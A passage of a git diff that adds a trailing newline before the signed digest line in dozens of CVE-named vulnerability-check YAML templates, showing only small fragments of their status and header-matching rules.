@@ http: - type: status status: - 200 -# digest: 4b0a0048304602210092894265fbd6824979792a526097d4201028a8f1eb7d6158247be117ebc9314902210080736d78798ec2acd0a872848b84c69d77436576fe447a6d78fae2c03d83f655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210092894265fbd6824979792a526097d4201028a8f1eb7d6158247be117ebc9314902210080736d78798ec2acd0a872848b84c69d77436576fe447a6d78fae2c03d83f655:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 7cbbaf56a0..c7f11b7dd5 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e96166e459e0d80e822aa0bbbc7416475f92b1e7fa1326c59693e1412af47a1d022072f2482aeea7679d9e4fecea4b9a1ea156a959e4fe8b3e8114412d0701266cde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e96166e459e0d80e822aa0bbbc7416475f92b1e7fa1326c59693e1412af47a1d022072f2482aeea7679d9e4fecea4b9a1ea156a959e4fe8b3e8114412d0701266cde:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 9d53a64539..bcc99e7fb7 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c4a3d46d1801becc541e9d0ca7d55a0cc960151b5743226fb4cf60b1126bfd51022100d8fb20b07f2d868a9c86bd505acc475614c7aee3d426e196020e8e7369ee6412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c4a3d46d1801becc541e9d0ca7d55a0cc960151b5743226fb4cf60b1126bfd51022100d8fb20b07f2d868a9c86bd505acc475614c7aee3d426e196020e8e7369ee6412:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index a8aefe1112..6831674b4e 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220266a5b7254dc96668f6e9fab893909109081016f06269fd08145b3de2313785c022100aee9f7ecffa33316a2f815dbf88242cfb2d1fa1e2156ab409908f15488cd8e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220266a5b7254dc96668f6e9fab893909109081016f06269fd08145b3de2313785c022100aee9f7ecffa33316a2f815dbf88242cfb2d1fa1e2156ab409908f15488cd8e9f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 77cf897404..6b0d0bae06 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022017d4c618588441bdf8a80574160209ea27f680572e7c9a93c676609ac176b9620221009141d2db1c2e301eb2143c257c181cafaf09786ba46e4c7a242dedcd813311a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022017d4c618588441bdf8a80574160209ea27f680572e7c9a93c676609ac176b9620221009141d2db1c2e301eb2143c257c181cafaf09786ba46e4c7a242dedcd813311a6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 8e97b9930e..5fb524c66a 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc32a8ebc729c620b26d9c2bf24f91c90ad94076b2d26fb1163116e9b7fe6a860220153e0d08d2c3a5e7c1b9287b936de7b3e506941cb05c9e9888bcc429346b9277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dc32a8ebc729c620b26d9c2bf24f91c90ad94076b2d26fb1163116e9b7fe6a860220153e0d08d2c3a5e7c1b9287b936de7b3e506941cb05c9e9888bcc429346b9277:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index 412aba1b77..0d1c2ec4ce 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -36,4 +36,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502203623701ff27bf8d278c9c0c765c31fb721df91ffded5adee471821110ab50d36022100ab975d2ceea8217354ae26f34d730843620a4836af846c46de4f4babe89b9337:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203623701ff27bf8d278c9c0c765c31fb721df91ffded5adee471821110ab50d36022100ab975d2ceea8217354ae26f34d730843620a4836af846c46de4f4babe89b9337:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 01d669cd7c..4b79ee13ad 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009070e15bc7268fc0951412b799bd0c562fd5caaf80206751d8da01176e3031a0022100fbe4d3611595560fda39f2fd602992b710f439afa47849e61d461bb17230fc1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009070e15bc7268fc0951412b799bd0c562fd5caaf80206751d8da01176e3031a0022100fbe4d3611595560fda39f2fd602992b710f439afa47849e61d461bb17230fc1b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index ba9fc276ef..4379e300ae 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220340fbb7580c449aad38d7c8b57b166a5a94fb862d08e018f5bcca9f8ec8f62c8022058dca0b2989ed61f642f09c7c337b5d76c2ce9efe8fb2ce25724dab0837991b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220340fbb7580c449aad38d7c8b57b166a5a94fb862d08e018f5bcca9f8ec8f62c8022058dca0b2989ed61f642f09c7c337b5d76c2ce9efe8fb2ce25724dab0837991b6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 679c5f84ce..4d7e803be9 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220192df91e91edf6160316514395867faef4c6c8b405f5e1af07eb66dcb8f58cb302204fb22cc8ad67d1e67f1dc0264b7fbdc14a5a9f03a80d9301ef447a3553740a6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220192df91e91edf6160316514395867faef4c6c8b405f5e1af07eb66dcb8f58cb302204fb22cc8ad67d1e67f1dc0264b7fbdc14a5a9f03a80d9301ef447a3553740a6e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 262011bc44..b871106bd9 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022076e9e2db989cd39cc08cd383f09e769cef2b33866c2c8be55c3e7928bc0b9013022100f9f92cd4a47e886ea5744c19d28e8147629da4599a91113e91746a99d9cc6ab8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022076e9e2db989cd39cc08cd383f09e769cef2b33866c2c8be55c3e7928bc0b9013022100f9f92cd4a47e886ea5744c19d28e8147629da4599a91113e91746a99d9cc6ab8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index e0020609c3..eb8269ab97 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d822a37f073ac199efdfd2d9a30c6f9cf4615c85c38c5091f8a21db7d1721817022100b48fa2a80ec3a3be826fd8e5fc49999893bcd7a3cc340d826eb82076513efa38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d822a37f073ac199efdfd2d9a30c6f9cf4615c85c38c5091f8a21db7d1721817022100b48fa2a80ec3a3be826fd8e5fc49999893bcd7a3cc340d826eb82076513efa38:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index e698bdc68a..ba3354e86f 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220719af3c420bd487e63e7749b439fbbbadb938359d4c803b5479a60bd8b5d63b50220633c7544eb3eb5fbd3319c3122a5692bc7248e076dfddcac33f4b0f3a6f99724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220719af3c420bd487e63e7749b439fbbbadb938359d4c803b5479a60bd8b5d63b50220633c7544eb3eb5fbd3319c3122a5692bc7248e076dfddcac33f4b0f3a6f99724:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index e6a39e70e9..90ba66b51b 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d35bc3cfbe350e30fabcd62c15feb0f9767dd475354cf61426daad8f12039cf202202e84de3ed4b454f97ba956c06c405674d36e77c933238b5edc6d2ac6b66fde44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d35bc3cfbe350e30fabcd62c15feb0f9767dd475354cf61426daad8f12039cf202202e84de3ed4b454f97ba956c06c405674d36e77c933238b5edc6d2ac6b66fde44:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 5e52dd0a83..d870dcf2a2 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b1083c7dd1447412fdbf81b5f4c76dc3dcffe09eaf0d489eb3d169a45b2f569c022100a632b2ca4e7d169c1f8d3ae4351208807629332aba84424911fa0b426ab1d050:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b1083c7dd1447412fdbf81b5f4c76dc3dcffe09eaf0d489eb3d169a45b2f569c022100a632b2ca4e7d169c1f8d3ae4351208807629332aba84424911fa0b426ab1d050:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index 3b559b556c..6f3e22be8c 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e99a80126eed30df5a4193d3d743a5a89adc0c587ca6debc0b7ec8c8c353be60022100ed34a4d5132587d259f1dfc4cd32ffb4f6b9ef99ae4bb789decd75bbd8709c6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e99a80126eed30df5a4193d3d743a5a89adc0c587ca6debc0b7ec8c8c353be60022100ed34a4d5132587d259f1dfc4cd32ffb4f6b9ef99ae4bb789decd75bbd8709c6a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index d522b3f92c..15c1475563 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220553a6f05abdd1d2cb15b2c71b4430d2354485ca31ea9e1eef1b4a7e401d30b7d022100a3e64c6dec9f1825859bc7599708a712237bd66da980d14dea203fb12d00d057:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220553a6f05abdd1d2cb15b2c71b4430d2354485ca31ea9e1eef1b4a7e401d30b7d022100a3e64c6dec9f1825859bc7599708a712237bd66da980d14dea203fb12d00d057:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 844489f9f3..b90a6ff96d 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402201e11c98a5b7534673b865d29aa1f0bac5c6f2c7f6312c70e1db58117cd2cc4ba0220376cf8c17185c7db2420cfa875a85fc3a9706ac984750e5a44ec21dfe22add2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201e11c98a5b7534673b865d29aa1f0bac5c6f2c7f6312c70e1db58117cd2cc4ba0220376cf8c17185c7db2420cfa875a85fc3a9706ac984750e5a44ec21dfe22add2c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 0085aa4156..ad064508bc 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210098e088b8bf7fe95fa611b4a91b4088df2c5d39461260f3e69ee3d45695d4175802202ad5f3eb6be9598ad408276d128a5cfc2c8464d38f21a8e17a414dc95f1fe45e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210098e088b8bf7fe95fa611b4a91b4088df2c5d39461260f3e69ee3d45695d4175802202ad5f3eb6be9598ad408276d128a5cfc2c8464d38f21a8e17a414dc95f1fe45e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index bd7f6bc97d..189ea05756 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e8199e6b84647900f02cf6845650746fbd0c593ea01f15424818b47e1d10aaa10220256df434417a15f7febedf2991c480218a7b2a6c03ec440354074c03aa0e1cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e8199e6b84647900f02cf6845650746fbd0c593ea01f15424818b47e1d10aaa10220256df434417a15f7febedf2991c480218a7b2a6c03ec440354074c03aa0e1cc1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 426dc22b22..756794ef66 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100945213e569fbec49a10942950d44b3fad41eba0f9a1595de000202e2d1d47b05022008578b69747116114f4584d220b605dd31ac4f145513549cee7285e2bdec9579:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100945213e569fbec49a10942950d44b3fad41eba0f9a1595de000202e2d1d47b05022008578b69747116114f4584d220b605dd31ac4f145513549cee7285e2bdec9579:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 3dd144adc9..26cadbccf0 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ca7e6595998e96194eb75faf20258537c48417c42c8a005838b8191ff111cf3c0221008886ceaeb4d3f234b48e045f91b0820244c8151bfa7a96ab416d5a21b7fe0efb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ca7e6595998e96194eb75faf20258537c48417c42c8a005838b8191ff111cf3c0221008886ceaeb4d3f234b48e045f91b0820244c8151bfa7a96ab416d5a21b7fe0efb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index e7187b4857..a7fcd2ed92 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dbe37f65a65a51f606e1c97d67eeac2cc620198e518ca3d8c774dd94cce82fba02202660ec1575805a55befbf76d146d5abf1e68c15c82c4b4dc67936e195b6e875a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dbe37f65a65a51f606e1c97d67eeac2cc620198e518ca3d8c774dd94cce82fba02202660ec1575805a55befbf76d146d5abf1e68c15c82c4b4dc67936e195b6e875a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 989588b956..d87d62b694 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -40,4 +40,5 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' -# digest: 4b0a00483046022100e3fe32b7e097e284564ac05b68a52cdd7d8e8b84461f8470662d6cb1255e21de022100a2b64cc6f8c15c0ece31a30f2376d40eeca4dcc956616e3e5e979267655030e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e3fe32b7e097e284564ac05b68a52cdd7d8e8b84461f8470662d6cb1255e21de022100a2b64cc6f8c15c0ece31a30f2376d40eeca4dcc956616e3e5e979267655030e3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index cfe8ab786b..91cb1645bb 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d23a109b51382f1b561a4e3284fffab21b8d563d16f0010cd4c78681e282db5702201bd596b5ecef56afcebc515ae2bfe2cefc5d90570af2eb72ecf30ae4d5ea7df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d23a109b51382f1b561a4e3284fffab21b8d563d16f0010cd4c78681e282db5702201bd596b5ecef56afcebc515ae2bfe2cefc5d90570af2eb72ecf30ae4d5ea7df3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 8bce21d00d..c917b4bf07 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220700cee9e7955106d3d13e3256f1200075388fd3dc2bafe6a0973ce3858aa0817022100e7a99c152b0b4817712ad193202d64734ba2677a0da22b2737561a29acee66c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220700cee9e7955106d3d13e3256f1200075388fd3dc2bafe6a0973ce3858aa0817022100e7a99c152b0b4817712ad193202d64734ba2677a0da22b2737561a29acee66c8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 48b2c1f56b..1244606fe9 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fc3646472ef0483254baa382257d87b085c587edc5456b9e96dd077197cdec86022066d71518ee445c377f97054abff2c0d20c504b0ee1b3e3e2cf818af2676a8556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fc3646472ef0483254baa382257d87b085c587edc5456b9e96dd077197cdec86022066d71518ee445c377f97054abff2c0d20c504b0ee1b3e3e2cf818af2676a8556:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 70ab368560..3d731b6118 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051978e15c3c3d1218a1478db3faa0f3e2301ed1331bd2c50e1699ec7e5060099022100852194b468e22e072c900e9714c00f02e7256fe6b7ebe564ce70693e91b3c8a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022051978e15c3c3d1218a1478db3faa0f3e2301ed1331bd2c50e1699ec7e5060099022100852194b468e22e072c900e9714c00f02e7256fe6b7ebe564ce70693e91b3c8a1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 5d05fff7c3..7d7ec42613 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ba35e969fabc910542cc23770d57af184911cea3310b70d525517d3a6866f2c5022100b47d2dc93d99ba9452cc55b9ddda479ee2e60caa44febba7884a6126d3a7ff14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ba35e969fabc910542cc23770d57af184911cea3310b70d525517d3a6866f2c5022100b47d2dc93d99ba9452cc55b9ddda479ee2e60caa44febba7884a6126d3a7ff14:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index a0988007d0..a0aa5e1ca0 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200482039ef7e0ac9d3d0368d661c14b5a84bb85c907e4b76106ca31c86b4d60a9022100ba3ff9e880fdcc94e37273b5320de6af623d787f8901e744c426316a30b376e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200482039ef7e0ac9d3d0368d661c14b5a84bb85c907e4b76106ca31c86b4d60a9022100ba3ff9e880fdcc94e37273b5320de6af623d787f8901e744c426316a30b376e7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 4bccbd38f2..34d9e745a8 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d1020311a046d36d7d23abb015d5f267def253e5ef60cae63ab2a9a45ff7d65b0221008985a79d00734509578ba9bf8703bc6803f09cb43d338a5c5baa5b3831e9a44d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d1020311a046d36d7d23abb015d5f267def253e5ef60cae63ab2a9a45ff7d65b0221008985a79d00734509578ba9bf8703bc6803f09cb43d338a5c5baa5b3831e9a44d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 591abc965c..ed984aca6c 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022037bbb88b41b6ccc28a1745120bc45216ee87484b59d44190c551bc4487fd484f0221009f78dfc0e67ba796798ed1db8b942e27d4b5040b1f1a5fd427f547a82efd250d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022037bbb88b41b6ccc28a1745120bc45216ee87484b59d44190c551bc4487fd484f0221009f78dfc0e67ba796798ed1db8b942e27d4b5040b1f1a5fd427f547a82efd250d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index b557b1719a..66efb5728f 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b5381806d5ac561c5ccf41930cb5079f13ae25a76826f8c415a62082a0b0b6b8022075664bb7f344ca76a4b174583caa378ff178183eee2c2fecb7de8fbde37a1982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b5381806d5ac561c5ccf41930cb5079f13ae25a76826f8c415a62082a0b0b6b8022075664bb7f344ca76a4b174583caa378ff178183eee2c2fecb7de8fbde37a1982:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 9ab1c29a34..258e80ed6b 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210081973b2bbad63a01dc520bff5012b5c59488b799055127718e23fc04eb0ec5be022100dea352e98f39ecac5a95368bf876ae1955ae5e0e2c8002f54b45ffe8efc058c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210081973b2bbad63a01dc520bff5012b5c59488b799055127718e23fc04eb0ec5be022100dea352e98f39ecac5a95368bf876ae1955ae5e0e2c8002f54b45ffe8efc058c5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index f760330c0d..cc5346f0c1 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a9330d39d31eb3b4fd37c66db18b13381947e7dab17f22b2b857b996d566abc8022100f2e7bb5875e6ef43a183995680d20d2453cb88b8785550818aad21c406e6f3f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a9330d39d31eb3b4fd37c66db18b13381947e7dab17f22b2b857b996d566abc8022100f2e7bb5875e6ef43a183995680d20d2453cb88b8785550818aad21c406e6f3f7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 6db83f4603..1c3206f9f5 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008cc917f37b33d7346e4adb6a5fa703b3abe3704a0a9b2bc83522da705eb2a437022100cb6f7d08da31b371af68d0ee6cdd460338dee640e37db4933f338b16539fa7f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008cc917f37b33d7346e4adb6a5fa703b3abe3704a0a9b2bc83522da705eb2a437022100cb6f7d08da31b371af68d0ee6cdd460338dee640e37db4933f338b16539fa7f4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index b7fe38d630..93f2492c93 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022070b6255d877f1aa300cd44f5b9812feb80af8e391d7199dc1e09bbc5d8e65794022100ff09079e913b638817ab56a8f7b440aa994c67aff73480a6f34d0bcda0725d0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022070b6255d877f1aa300cd44f5b9812feb80af8e391d7199dc1e09bbc5d8e65794022100ff09079e913b638817ab56a8f7b440aa994c67aff73480a6f34d0bcda0725d0d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index f00c5e6c0e..53712a0553 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e7fbb1d6146d765bef5c137ad3370ce3a842e723476577c4d206596e75cf9510022100928cbaec302c73840efdcd6fc1caef607240b2da84be297e864e6800dc86af33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 